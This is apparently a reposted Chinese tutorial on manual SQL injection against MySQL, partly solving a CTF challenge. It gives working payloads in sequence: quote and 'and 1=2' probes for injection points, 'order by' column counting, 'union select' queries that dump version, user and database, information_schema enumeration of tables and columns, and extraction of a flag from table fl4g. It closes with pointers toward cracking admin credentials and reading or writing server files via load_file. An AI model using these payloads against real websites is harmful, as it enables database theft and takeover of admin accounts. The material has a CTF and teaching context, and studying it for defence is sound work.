2. 程式人生 > >SQL注入(四)手工注入攻擊步驟

SQL注入(四)手工注入攻擊步驟

阿新 發佈:2019-02-09

0)首先測試正常資料。
連結的結尾新增【?id=1(數字任意)
這裡寫圖片描述
1) 判斷是否存在注入點;
【?id=32(數字任意)】連結的結尾依次新增語句【‘】、【and 1=1】和【and 1=2】,來判斷網站是否存在注入點。嘗試在正常資料後加上單引號,發現數據為空,加上註釋符(註釋符:#,–+ , //, – )後發現依舊可以正常輸出,存在注入點。看是否報錯,如果資料庫報錯,說明後臺數據庫處理了我們輸入的資料,那麼有可能存在注入點。
這裡寫圖片描述這裡寫圖片描述
2) 判斷欄位長度;
在連結後面新增語句【 order by 11 (數字任意)】,根據頁面返回結果,來判斷站點中的欄位數目。該題中已經有四處回顯(名字和3科分數),所以就猜4和5,得知查詢結果中有四列
這裡寫圖片描述

這裡寫圖片描述
3)判斷欄位回顯位置;
在連結後面新增語句【 union select 1,2,3,4,5,6,7,8,9,10,11#】進行聯合查詢(聯合查詢時記得把前面的查詢為空)來暴露可查詢的欄位號。
這裡寫圖片描述
該題四處都有回顯
3) 判斷資料庫資訊;
利用內建函式暴資料庫資訊
version()版本;database()資料庫;user()使用者;
不用猜解可用欄位暴資料庫資訊(有些網站不適用):
and 1=2 union all select version()
and 1=2 union all select database()
and 1=2 union all select user()
作業系統資訊:and 1=2 union all select @@global.version_compile_os from mysql.user
資料庫許可權:
and ord(mid(user(),1,1))=114 返回正常說明為root
4) 查詢資料庫名;
Mysql 5 以上有內建庫 information_schema,儲存著mysql的所有資料庫和表結構資訊union select information_schema from information_schema.schemata
(語句在顯示位)
該題看一下資料庫資訊,庫名為skctf_flag
這裡寫圖片描述
5) 查詢資料庫表名; 

union select group_concat(table_name) from information_schema.tables where table_schema=database()

這裡寫圖片描述
該題語句為【-1’ union select 1,(select group_concat(table_name) from information_schema.tables where table_schema=database()),3,4#】得知表名為fl4g
6) 查詢列名

【-1' union select 1,(select group_concat(column_name) from information_schema.columns where table_name='fl4g'),3,4#】

這裡寫圖片描述
7)知道表名知道列名,獲取資料

-1' union select 1,(select skctf_flag from fl4g),3,4#

得出flag
8) 查詢資料庫表中所有欄位以及欄位值;
and 1=2 union select 1,2,3,TABLE_NAME,5,6,7,8,9,10 from information_schema.TABLES where TABLE_SCHEMA=資料庫(十六進位制) limit 0(開始的記錄,0為第一個開始記錄),1(顯示1條記錄)—
and 1=2 Union select 1,2,3,COLUMN_NAME,5,6,7,8,9,10 from information_schema.COLUMNS where TABLE_NAME=表名(十六進位制)limit 0,1
9) 猜解賬號密碼;
10) 登陸管理員後臺。
讀檔案: union select 絕對路徑 load_file
寫入檔案:union select

相關推薦

SQL注入手工注入攻擊步驟

0)首先測試正常資料。 連結的結尾新增【?id=1(數字任意)】 1) 判斷是否存在注入點; 【?id=32(數字任意)】連結的結尾依次新增語句【‘】、【and 1=1】和【and 1=2】,來判斷網站是否存在注入點。嘗試在正常資料後加上單引號,

Spring Boot IoC學習依賴注入DI

四、依賴注入DI 簡介 Bean之間的依賴稱為依賴注入。 例:人穿不同的鞋子去完成不同的活動。比如,人穿籃球鞋去打籃球,穿跑步鞋去跑步鍛鍊,穿皮鞋去上班等等。所以人和鞋子就是依賴關係。 我們用程式碼來展現依賴,定義兩個介面,一個事人類(Person),一個是鞋子

Spring原始碼:bean建立屬性注入

一、populateBean 在建立了bean的例項後,Spring的下一步工作就是為bean注入其依賴的屬性: protected void populateBean(String beanName, RootBeanDefinition mbd, @Nullable

Quartz2.x學習筆記:spring注入異常解決方法

在使用Quartz與spring整合時,有時需要在Job任務類裡注入spring的bean。如下: 那麼問題來了,當你啟動專案時,會發現報了空指標異常: 查閱資料以及百度之後,終於找到一個解決

SQL基礎SQL命令

版本 數據庫應用 ges odi 改變 sql per 測試 數據類型 1、CREATE INDEX 語句   CREATE INDEX 語句用於在表中創建索引。在不讀取整個表的情況下,索引使數據庫應用程序可以更快地查找數據。   索引:在表中創建索引,以便更加快速高效地查

T-SQL基礎之集合運算

三個運算子 T-SQL支援三個集合運算子:UNION、INTERSECT、EXCEPT。 集合運算子查詢的一般形式如下: Query1 <set_operator> Query2 -- 這裡,ORDER BY子句對最終結果集進行排序 [ORDER BY...] ORDER

spring依賴注入-java注入,xml注入,混合注入

java注入 @Configuration public class CDPlayerConfig { @Bean public CompactDisc compactDisc(){

10、IoC之依賴注入3-解析注入的屬性

對於屬性注入的間接引用,具體的解析過程是在BeanDefinitionValueResolver類中的resolveValueIfNecessary方法中實現的,主要解析Array,Set,Map,props和字串型別的間接引用。具體實現原始碼如下: // BeanDe

T-SQL 語句—— 檢視操作

CREATE VIEW v_employee(id,name,hhhhh) AS SELECT id,name,'哈哈哈哈' FROM employee -- 建立檢視 GO -- 建立檢視語句必須是批處理的唯一語句 SELECT * FROM v_employee -- 使用檢視 -- 建立一個檢視

SQL注入教程——寬位元組注入

前言 在mysql中,用於轉義(即在字串中的符號前加上”\”)的函式有addslashes,mysql_real_escape_string,mysql_escape_string等,還有一種情況是magic_quote_gpc,不過高版本的PHP將去除這個特

暑期練習web18:簡單的sql注入1,2實驗吧手工注入及sqlmap

目前只會做1和2。。3的話網上查了wp不知道他們sqlmap沒防任何過濾咱們跑出來的。。。等來年長了本事了,一定要自己手工做出來 注入1的話呢,在輸入1’ or ‘1’=’1的時候就發現存在過濾,後來發現是空格被過濾了,所以我們用註釋符/*來替換空格,注入1的

sql注入解析避開過濾

1、 不使用被過濾的字元: 比如注入一個數字資料,就不需要使用單引號;’ or 1=1–,如果註釋字元被過濾,我們可以這樣寫 ‘ or ’1′=’1 。 2、 避免使用簡單確認: 如果select關鍵字被過濾,我們可以嘗試用下面的方法書寫select,SeleCT; selselectect;或者使用

繞過安全狗進行sql注入MySQL

看我如何一步一步繞過安全狗 前言 前幾天滲透了一個站,由於沒有做好善後工作被管理員發現了,再次訪問那個站的時候,管理員已經刪了大馬,裝上了網站安全狗(我估計大馬應該是安全狗刪除的,畢竟那個管理員真的太懶了,我的小馬還在,並且居然菜刀還可以連線),為了給這個管理員增強點安全防護意識

Spring 學習——注入屬性值細節

字面值 •字面值:可用字串表示的值,可以通過 <value> 元素標籤或 value 屬性進行注入。 •基本資料型別及其封裝類、String 等型別都可以採取字面值注入的方式 •若字面值中包含特殊字元,可以使用 <![CDATA[]]> 把字面值包裹起來。 &

DVWA 黑客攻防實戰命令列注入Command Injection

文章會討論 DVWA 中低、中、高、不可能級別的命令列注入 這裡的需求是在伺服器上可以 ping 一下其他的伺服器 低階 如果你是從 初步認識網路漏洞這篇檔案過來的,可以跳過低階的。 這裡的需求是在伺服器上可以 ping 一下其他的伺服器 低階 低階程式碼是這樣。和之前的文章 內容是一樣

C#進階系列——MEF實現設計上的“鬆耦合”:建構函式注入

前言:今天十一長假的第一天,本因出去走走,奈何博主最大的樂趣是假期坐在電腦前看各處堵車,順便寫寫部落格,有點收穫也是好的。關於MEF的知識,之前已經分享過三篇,為什麼有今天這篇?是因為昨天分享領域服務的時候,用到MEF的注入有參建構函式的方法,博主好奇心重,打算稍微深挖一下,這篇來對此知識點做個總結。 還是

WEB漏洞測試——HTML注入 & XSS攻擊

上一篇介紹了我們安裝BWAPP來完成我們的漏洞測試 在BWAPP中,將HTML Injection和XSS做了非常詳細的分類,那麼為什麼要將兩個一起講呢?歸根結底,我覺得這兩個分明是一個玩意,充其量是攻擊的方式不一樣。 我們先來介紹一下這兩種漏洞的原理,簡單說:當用戶在

sql注入筆記

mysql注入 一般注入,select注入 1.註釋符號 # /* -- 2.過濾空格注入 使用/**/或()或+代替空格 %0c = form feed, new page %09 = horizontal tab %0d = carriage

史上最適合新手的Dagger2教程帶參注入

Dagger2系列教程目錄: 前面我們講解了構造方法中不帶引數的各種注入方式, 這節課,我們來學習構造方法中帶引數的物件如何使用Dagger2注入。 · 常規實現 我們先不使用Dagger2,以常規的方式注入一個帶參構造的物件: 帶參構造類:

Web Hacking 101 中文版 十、XML 外部實體注入

十四、XML 外部實體注入 作者:Peter Yaworski 譯者:飛龍 XML 外部實體(XXE)漏洞涉及利用應用解析 XML 輸入的方式,更具體來說,應用程式處理輸入中外部實體的包含方式。為了完全理解理解如何利用,以及他的